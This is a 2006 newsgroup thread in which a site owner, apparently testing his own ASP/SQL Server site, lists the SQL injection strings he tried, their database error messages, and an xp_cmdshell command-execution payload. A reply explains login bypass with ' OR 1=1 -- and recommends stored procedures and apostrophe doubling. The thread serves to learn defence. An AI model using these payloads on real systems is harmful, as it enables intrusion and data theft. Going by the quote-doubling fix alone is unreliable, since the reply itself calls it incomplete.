> My web server has MsSql at the back-end and asp at the front-end. A
> UserID, Password, and a dynamically generated code field are present on
> the website for the user to logon. UserID field takes an EMAIL address as
> input. There are other features in the website such as search n advanced
> search, cart etc.
>
> At the back-end, stored procedures are used. However, according to report
> generated by Acunetix v3.0 the results have been otherwise. A possibility
> of successful Sql injection attack has been shown in the report (in the
> search, advanced search field, Forgot Password fields).
>
> I have tried & worked out injection strings to my understanding and
> knowledge of this subject. I also studied the report generated by the
> Acunetix with the tested parameters making site vulnerable. However, the
> security of the website could not be completely tested with these
> information.
>
> According to the results I received from Acunetix, pages - Search,
> Advanced Search, Cart - were susceptible to Injection, Css scripts,
> parameter manipulation etc. I used the parameters with which Acunetix
> tested the pages, manually entering them in the respective fields, with no
> positive results.
>
> I tested the 'Forget Password' option (forgetpassword.asp) on my site with
> few strings. Though I couldnt any deep, still I was able to gather little
> information as Table-name, field-names from it. Though the developer team
> is confident that the db is all safe, I doubt so. Please find below the
> strings that I tested the page with:
>
> A)
> ' having 1=1--
>
> Column 'table_name.col_pwd' is invalid in the select list
> because it is not contained in an aggregate function and there is no GROUP
> BY clause.
> /pagename/page1.asp, line 41
>
> B)
> ' group by table_name.col_username having 1=1--
>
> Microsoft OLE DB Provider for SQL Server error '80040e14'
> Column 'table_name.col_pwd' is invalid in the select list because it is
> not contained in either an aggregate function or the GROUP BY clause.
> /pagename/page1.asp, line 41
>
> C)
> ' union select count(col_pwd) from table_name--
>
> Microsoft OLE DB Provider for SQL Server error '80040e07'
> The sum or average aggregate operation cannot take a varchar data type as
> an argument.
>
> /pagename/page1.asp, line 41
>
> D)
> ' union select sum(col_username) from table_name--
>
> Microsoft OLE DB Provider for SQL Server error '80040e07'
> The sum or average aggregate operation cannot take a nvarchar data type as
> an argument.
>
> /pagename/page1.asp, line 41
>
> E)
> ' OR 1=1-- OR desc table_name;
>
> ' OR 1=1-- UNION desc table_name;
>
> Your Pasword has been sent to your Email address.
>
> F)
> ' union select min(col_username),1,1 from table_name where col_username >
> 'a'--
>
> Microsoft OLE DB Provider for SQL Server error '80040e14'
> All queries in an SQL statement containing a UNION operator must have an
> equal number of expressions in their target lists.
>
> /pagename/page1.asp, line 41
>
> G)
> ' union select * from master..sysobjects
>
> Microsoft OLE DB Provider for SQL Server error '80040e14'
> Unclosed quotation mark before the character string ''.
> /pagename/page1.asp, line 41
>
> This can b avoided by customizing the errors, though.
>
> Next. i tried these on two pages:
>
> ---> '; exec master..xp_cmdshell 'iisreset';-- <---
>
> page1-
> Forget password page:
>
> ---> \\\'; exec master..xp_cmdshell \\\'iisreset\\\';-- <---
> Error:Login id not valid in this section.
>
> page2-
>
> login page:
> Incorrect Username or Password
>
> am i doin it wrong here?
>
> The 'Forgot Password' page takes 'Login ID' as the input. Login ID is in
> the form of 'Email Address' that we need to enroll with at the time of
> registeration/member creation.
>
> The page gives me the following string in the input text box and the
> following error string:
>
> \\\'; exec master..xp_cmdshell \\\'\\\'iisreset\\\'\\\';--
> Login id is invalid in this section.
>
> The address of this page now (after the error)
> ishttp://www.example_site.com/test_page1/help.php?section=Password_Recover
> y_error&errortype=C&email=+%5C%27%3B+exec+master..xp_cmdshell+%5C%27%5C%27
> iisreset%5C%27%5C%27%3B--
>
> ---
>
> I know that we shud use strongly typed variables wherever possible; use
> stored procs; shud keep a check on the length of user submitted strings,
> maxlength on html input boxes; remove the nasty characters.
>
> Plz suggest where am i missing here and how shud i construct the strings
> here. the stings suggested by Acunetix doesnt seem to work on the site.
>
> Thanks.

"Daniel Crichton" wrote:

> Ganeshen wrote  on Fri, 19 May 2006 05:16:02 -0700:
>
> > My web server has MsSql at the back-end and asp at the front-end. A
> > UserID, Password, and a dynamically generated code field are present on
> > the website for the user to logon. UserID field takes an EMAIL address as
> > input. There are other features in the website such as search n advanced
> > search, cart etc.
> >
> > At the back-end, stored procedures are used. However, according to report
> > generated by Acunetix v3.0 the results have been otherwise. A possibility
> > of successful Sql injection attack has been shown in the report (in the
> > search, advanced search field, Forgot Password fields).
> >
> > I have tried & worked out injection strings to my understanding and
> > knowledge of this subject. I also studied the report generated by the
> > Acunetix with the tested parameters making site vulnerable. However, the
> > security of the website could not be completely tested with these
> > information.
> >
> > According to the results I received from Acunetix, pages - Search,
> > Advanced Search, Cart - were susceptible to Injection, Css scripts,
> > parameter manipulation etc. I used the parameters with which Acunetix
> > tested the pages, manually entering them in the respective fields, with no
> > positive results.
> >
> > I tested the 'Forget Password' option (forgetpassword.asp) on my site with
> > few strings. Though I couldnt any deep, still I was able to gather little
> > information as Table-name, field-names from it. Though the developer team
> > is confident that the db is all safe, I doubt so. Please find below the
> > strings that I tested the page with:
> >
> > A)
> > ' having 1=1--
> >
> > Column 'table_name.col_pwd' is invalid in the select list
> > because it is not contained in an aggregate function and there is no GROUP
> > BY clause.
> > /pagename/page1.asp, line 41
> >
> > B)
> > ' group by table_name.col_username having 1=1--
> >
> > Microsoft OLE DB Provider for SQL Server error '80040e14'
> > Column 'table_name.col_pwd' is invalid in the select list because it is
> > not contained in either an aggregate function or the GROUP BY clause.
> > /pagename/page1.asp, line 41
> >
> > C)
> > ' union select count(col_pwd) from table_name--
> >
> > Microsoft OLE DB Provider for SQL Server error '80040e07'
> > The sum or average aggregate operation cannot take a varchar data type as
> > an argument.
> >
> > /pagename/page1.asp, line 41
> >
> > D)
> > ' union select sum(col_username) from table_name--
> >
> > Microsoft OLE DB Provider for SQL Server error '80040e07'
> > The sum or average aggregate operation cannot take a nvarchar data type as
> > an argument.
> >
> > /pagename/page1.asp, line 41
> >
> > E)
> > ' OR 1=1-- OR desc table_name;
> >
> > ' OR 1=1-- UNION desc table_name;
> >
> > Your Pasword has been sent to your Email address.
> >
> > F)
> > ' union select min(col_username),1,1 from table_name where col_username >
> > 'a'--
> >
> > Microsoft OLE DB Provider for SQL Server error '80040e14'
> > All queries in an SQL statement containing a UNION operator must have an
> > equal number of expressions in their target lists.
> >
> > /pagename/page1.asp, line 41
> >
> > G)
> > ' union select * from master..sysobjects
> >
> > Microsoft OLE DB Provider for SQL Server error '80040e14'
> > Unclosed quotation mark before the character string ''.
> > /pagename/page1.asp, line 41
> >
> > This can b avoided by customizing the errors, though.
> >
> > Next. i tried these on two pages:
> >
> > ---> '; exec master..xp_cmdshell 'iisreset';-- <---
> >
> > page1-
> > Forget password page:
> >
> > ---> \\\'; exec master..xp_cmdshell \\\'iisreset\\\';-- <---
> > Error:Login id not valid in this section.
> >
> > page2-
> >
> > login page:
> > Incorrect Username or Password
> >
> > am i doin it wrong here?
> >
> > The 'Forgot Password' page takes 'Login ID' as the input. Login ID is in
> > the form of 'Email Address' that we need to enroll with at the time of
> > registeration/member creation.
> >
> > The page gives me the following string in the input text box and the
> > following error string:
> >
> > \\\'; exec master..xp_cmdshell \\\'\\\'iisreset\\\'\\\';--
> > Login id is invalid in this section.
> >
> > The address of this page now (after the error)
> > ishttp://www.example_site.com/test_page1/help.php?section=Password_Recover
> > y_error&errortype=C&email=+%5C%27%3B+exec+master..xp_cmdshell+%5C%27%5C%27
> > iisreset%5C%27%5C%27%3B--
> >
> > ---
> >
> > I know that we shud use strongly typed variables wherever possible; use
> > stored procs; shud keep a check on the length of user submitted strings,
> > maxlength on html input boxes; remove the nasty characters.
> >
> > Plz suggest where am i missing here and how shud i construct the strings
> > here. the stings suggested by Acunetix doesnt seem to work on the site.
> >
> > Thanks.
>
>
> While the strings themselves do not actually seem to work (ie. they are
> causing errors), they are showing that you have a SQL injection risk - it
> only requires a determined person to try different strings to be able to do
> something to your data. It appears your problem is due to creating SQL by
> contatenating strings without validating those strings first, so when there
> is a ' in them it results in the SQL being changed. eg. let's say you have a
> table called Users with logins and passwords, and you're looking for a
> matching record using the following in ASP (where objRec is an ADO
> Recordset)
>
> objRec.Open "SELECT * FROM Users WHERE Login = '" & Request("login") & "'
> AND Password = '" & Request("password") & "'"
>
> Passing in the form variables directly is a very bad idea. If someone say
> uses the following string
>
> ' OR 1=1 --
>
> for the password value, then the resulting SQL would look like this (using
> the string John for the login)
>
> SELECT * FROM Users WHERE Login = 'John' AND Password = '' OR 1=1 --'
>
> and now your entire Users table is pulled into the recordset because the OR
> 1=1 is a match to every record in the table and the closing ' for the
> Password value is ignored as it comes after a comment tag, so making the SQL
> syntactically valid. At best this allows access to the system if the rest of
> the page just treats a non-empty recordset as having a match. At worst if
> the page displays the recordset data (say the developer put a loop in
> through the recordset in case of more than 1 matching row, although that
> would be a very silly thing to do) then your entire User table is now
> displayed in the ASP page - and your "hacker" has pick of account details to
> login with, and you've got a Data Protection violation on your hands.
>
> The above example is a very simple one, and in a real application should
> never happen - but it highlights how easy it to make mistakes when creating
> SQL dynamically. Check out the link posted by Omnibuzz in the other reply
> for plenty of info on the basics of SQL injection and what to look for.
>
> Oh, and in the above case, if you have a Stored Procedure taking the 2
> values and doing the query, eg.
>
> CREATE PROCEDURE CheckUser @login varchar(50), @password varchar(50) AS
> SELECT * FROM Users WHERE Login = @login AND Password = @password
>
> then that password value of ' OR 1=1 --' doesn't have the same effect, it
> results in the same as the following:
>
> SELECT * FROM Users WHERE Login = 'John' AND Password = ''' OR 1=1 --'''
>
> where the doubling of the ' inside the string causes the SQL parser to treat
> it as a string literal, so you won't get a match unless John's password
> happens to be that string.
>
> A quick and nasty solution to most SQL injection attacks like this is to put
> a simple Replace in the ASP code to change all single apostrophes into 2,
> eg. instead of using Request("login"), use
> Replace(Request("login"),"'","''")   , however this still doesn't close all
> entry points and a thorough review of all your code is really needed, and
> try to move all your SQL into Stored Procedures.
>
> Dan